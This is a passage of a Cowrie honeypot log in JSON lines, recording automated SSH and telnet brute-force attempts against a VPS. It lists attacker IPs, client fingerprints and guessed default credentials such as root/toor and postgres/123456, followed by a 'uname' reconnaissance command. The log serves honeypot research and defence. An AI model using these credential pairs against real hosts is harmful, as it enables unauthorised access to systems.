{"eventid":"cowrie.client.kex","hassh":"f555226df1963d1d3c09daf865abdc9a","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c;aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-dss"],"encCS":["aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: f555226df1963d1d3c09daf865abdc9a","sensor":"my-vps","timestamp":"2025-08-28T03:40:14.658256Z","src_ip":"212.227.235.229","session":"ebb775bc4705"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:40:14.685890Z","src_ip":"45.125.211.194","session":"b5b56a79c5ba"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":44132,"dst_ip":"1.2.3.4","dst_port":23,"session":"2de658d667cc","protocol":"telnet","message":"New connection: 212.227.125.160:44132 (1.2.3.4:23) [session: 2de658d667cc]","sensor":"my-vps","timestamp":"2025-08-28T03:40:14.694329Z"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:40:14.868944Z","src_ip":"45.125.211.194","session":"b5b56a79c5ba"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:40:15.077616Z","src_ip":"212.227.235.229","session":"ebb775bc4705"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:40:15.174641Z","src_ip":"212.227.235.229","session":"24cd5f9e181b"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:40:15.175728Z","src_ip":"212.227.235.229","session":"ebb775bc4705"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":40074,"dst_ip":"1.2.3.4","dst_port":22,"session":"055399b2bafc","protocol":"ssh","message":"New connection: 212.227.125.160:40074 (1.2.3.4:22) [session: 055399b2bafc]","sensor":"my-vps","timestamp":"2025-08-28T03:40:15.238705Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:40:15.239404Z","src_ip":"212.227.125.160","session":"055399b2bafc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:40:15.455474Z","src_ip":"212.227.125.160","session":"055399b2bafc"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:40:15.693393Z","src_ip":"212.227.235.229","session":"8d34daa076b7"}
{"eventid":"cowrie.login.failed","username":"docker","password":"docker123","message":"login attempt [docker/docker123] failed","sensor":"my-vps","timestamp":"2025-08-28T03:40:15.694165Z","src_ip":"45.125.211.194","session":"b5b56a79c5ba"}
{"eventid":"cowrie.login.failed","username":"app","password":"app","message":"login attempt [app/app] failed","sensor":"my-vps","timestamp":"2025-08-28T03:40:16.106467Z","src_ip":"212.227.125.160","session":"055399b2bafc"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:40:16.905266Z","src_ip":"45.125.211.194","session":"b5b56a79c5ba"}
{"eventid":"cowrie.session.closed","duration":"2.1","message":"Connection lost after 2.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:40:17.324505Z","src_ip":"212.227.125.160","session":"055399b2bafc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":50514,"dst_ip":"1.2.3.4","dst_port":22,"session":"c39c8c97e028","protocol":"ssh","message":"New connection: 212.227.125.160:50514 (1.2.3.4:22) [session: c39c8c97e028]","sensor":"my-vps","timestamp":"2025-08-28T03:40:20.955064Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:40:20.956231Z","src_ip":"212.227.125.160","session":"c39c8c97e028"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":60952,"dst_ip":"1.2.3.4","dst_port":22,"session":"c7e423ffaba2","protocol":"ssh","message":"New connection: 212.227.125.160:60952 (1.2.3.4:22) [session: c7e423ffaba2]","sensor":"my-vps","timestamp":"2025-08-28T03:40:26.700719Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:40:26.711715Z","src_ip":"212.227.125.160","session":"c7e423ffaba2"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":31499,"dst_ip":"1.2.3.4","dst_port":22,"session":"c1ced345168a","protocol":"ssh","message":"New connection: 45.125.211.194:31499 (1.2.3.4:22) [session: c1ced345168a]","sensor":"my-vps","timestamp":"2025-08-28T03:40:29.134113Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:40:29.145133Z","src_ip":"45.125.211.194","session":"c1ced345168a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:40:29.344025Z","src_ip":"45.125.211.194","session":"c1ced345168a"}
{"eventid":"cowrie.login.success","username":"root","password":"123","message":"login attempt [root/123] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:40:30.180208Z","src_ip":"45.125.211.194","session":"c1ced345168a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:40:30.680768Z","src_ip":"45.125.211.194","session":"c1ced345168a"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:40:30.681454Z","src_ip":"45.125.211.194","session":"c1ced345168a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:40:30.896269Z","src_ip":"45.125.211.194","session":"c1ced345168a"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:40:30.897430Z","src_ip":"45.125.211.194","session":"c1ced345168a"}
{"eventid":"cowrie.session.connect","src_ip":"194.233.79.134","src_port":47140,"dst_ip":"1.2.3.4","dst_port":22,"session":"fae8e893eaa3","protocol":"ssh","message":"New connection: 194.233.79.134:47140 (1.2.3.4:22) [session: fae8e893eaa3]","sensor":"my-vps","timestamp":"2025-08-28T03:40:34.827698Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:40:34.828384Z","src_ip":"194.233.79.134","session":"fae8e893eaa3"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:40:35.291687Z","src_ip":"194.233.79.134","session":"fae8e893eaa3"}
{"eventid":"cowrie.login.success","username":"root","password":"toor","message":"login attempt [root/toor] succeeded","sensor":"my-vps","timestamp":"2025-08-28T03:40:36.047494Z","src_ip":"194.233.79.134","session":"fae8e893eaa3"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T03:40:37.125432Z","src_ip":"194.233.79.134","session":"fae8e893eaa3"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T03:40:37.126168Z","src_ip":"194.233.79.134","session":"fae8e893eaa3"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:40:37.307320Z","src_ip":"194.233.79.134","session":"fae8e893eaa3"}
{"eventid":"cowrie.session.closed","duration":"2.5","message":"Connection lost after 2.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:40:37.308458Z","src_ip":"194.233.79.134","session":"fae8e893eaa3"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":43131,"dst_ip":"1.2.3.4","dst_port":22,"session":"8755ea242757","protocol":"ssh","message":"New connection: 45.125.211.194:43131 (1.2.3.4:22) [session: 8755ea242757]","sensor":"my-vps","timestamp":"2025-08-28T03:40:43.784906Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:40:43.814276Z","src_ip":"45.125.211.194","session":"8755ea242757"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:40:44.000025Z","src_ip":"45.125.211.194","session":"8755ea242757"}
{"eventid":"cowrie.login.failed","username":"postgres","password":"123456","message":"login attempt [postgres/123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:40:44.828037Z","src_ip":"45.125.211.194","session":"8755ea242757"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:40:46.038759Z","src_ip":"45.125.211.194","session":"8755ea242757"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":46688,"dst_ip":"1.2.3.4","dst_port":22,"session":"0f5df93c6599","protocol":"ssh","message":"New connection: 212.227.235.229:46688 (1.2.3.4:22) [session: 0f5df93c6599]","sensor":"my-vps","timestamp":"2025-08-28T03:40:47.524157Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:40:47.524854Z","src_ip":"212.227.235.229","session":"0f5df93c6599"}
{"eventid":"cowrie.session.closed","duration":32.92853569984436,"message":"Connection lost after 32 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:40:47.622804Z","src_ip":"212.227.125.160","session":"2de658d667cc"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:40:47.784709Z","src_ip":"212.227.235.229","session":"0f5df93c6599"}
{"eventid":"cowrie.login.failed","username":"sugi","password":"sugi","message":"login attempt [sugi/sugi] failed","sensor":"my-vps","timestamp":"2025-08-28T03:40:48.566803Z","src_ip":"212.227.235.229","session":"0f5df93c6599"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:40:49.828873Z","src_ip":"212.227.235.229","session":"0f5df93c6599"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":57592,"dst_ip":"1.2.3.4","dst_port":22,"session":"f1864a5a557a","protocol":"ssh","message":"New connection: 217.72.205.35:57592 (1.2.3.4:22) [session: f1864a5a557a]","sensor":"my-vps","timestamp":"2025-08-28T03:40:54.597575Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:40:54.598779Z","src_ip":"217.72.205.35","session":"f1864a5a557a"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":64829,"dst_ip":"1.2.3.4","dst_port":22,"session":"7811e7232ab9","protocol":"ssh","message":"New connection: 45.125.211.194:64829 (1.2.3.4:22) [session: 7811e7232ab9]","sensor":"my-vps","timestamp":"2025-08-28T03:40:58.755936Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:40:58.775182Z","src_ip":"45.125.211.194","session":"7811e7232ab9"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T03:40:58.979156Z","src_ip":"45.125.211.194","session":"7811e7232ab9"}
{"eventid":"cowrie.login.failed","username":"dev","password":"dev123456","message":"login attempt [dev/dev123456] failed","sensor":"my-vps","timestamp":"2025-08-28T03:40:59.803592Z","src_ip":"45.125.211.194","session":"7811e7232ab9"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T03:41:01.015467Z","src_ip":"45.125.211.194","session":"7811e7232ab9"}
{"eventid":"cowrie.session.connect","src_ip":"45.125.211.194","src_port":19271,"dst_ip":"1.2.3.4","dst_port":22,"session":"f0f39e2514a7","protocol":"ssh","message":"New connection: 45.125.211.194:19271 (1.2.3.4:22) [session: f0f39e2514a7]","sensor":"my-vps","timestamp":"2025-08-28T03:41:13.557500Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T03:41:13.562041Z","src_ip":"45.125.211.194","session":"f0f39e2514a7"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 